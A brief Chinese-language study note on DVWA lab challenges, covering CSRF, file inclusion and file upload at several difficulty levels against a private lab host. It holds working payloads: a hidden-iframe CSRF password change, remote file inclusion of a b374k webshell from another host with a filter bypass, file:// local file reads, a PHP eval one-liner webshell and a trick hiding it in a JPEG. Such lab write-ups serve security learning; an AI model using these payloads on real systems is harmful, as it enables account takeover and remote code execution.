链接: https://github.com/dhgdhg/DVWA-Note
CSRF
- low, medium
- 利用
<iframe style="width: 50%; height: 50%" src="http://192.168.119.131/DVWA/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change" > 可使用style="display: none"; 来隐藏iframe </iframe> Beng!
- 利用
- low, medium
File Inclusion
- low
- 通过尝试可以发现 可以指定打开并运行文件, 构造 url 使用 WebShell
http://192.168.119.131/DVWA/vulnerabilities/fi/?page=http://192.168.119.1/b374k.txt
- 通过尝试可以发现 可以指定打开并运行文件, 构造 url 使用 WebShell
- medium
- 依旧尝试使用
http://192.168.119.131/DVWA/vulnerabilities/fi/?page=http://192.168.119.1/b374k.txt
却发现提示Failed opening '192.168.119.1/b374k.txt'
可见是把http://
给过滤了, 所以再次构造urlhttp://192.168.119.131/DVWA/vulnerabilities/fi/?page=httphttp://://192.168.119.1/b374k.txt
- 依旧尝试使用
- high
- 依旧尝试使用
http://192.168.119.131/DVWA/vulnerabilities/fi/?page=http://192.168.119.1/b374k.txt
却发现提示ERROR: File not found!
, 试试其他文件也凉凉, 最后通过尝试可知包含的文件必须是file开头的文件,so, 可以使用file协议打开本地文件, 比如https://192.168.119.131/DVWA/vulnerabilities/fi/?page=file:///opt/lampp/htdocs/DVWA/index.php
- 依旧尝试使用
- low
File Upload
- low
- 上传一句话木马文件, 菜刀, 一条龙
- beng.php
<?php eval($_POST["cmd"]) ?>
- medium
- 再次上传beng.php, 报错
Your image was not uploaded. We can only accept JPEG or PNG images.
, emmm, 只接受jpep png, 改个后缀试试, 完犊子, 整不了, 想其他法, 通过burpsuit修改post发送数据和文件名试试 - duang
- 菜刀提权一条龙
- 再次上传beng.php, 报错
- high
- 再试试改post数据
Your image was not uploaded. We can only accept JPEG or PNG images.
, 我锤我自己, 再想想其他法, 凉凉, 不过!不过!不过!copy 1.jpg/b+beng.php/a 2.jpg
, 生成有一句话的内涵图, 可以配合file协议搞一波File Inclusion中的high
- 再试试改post数据
- low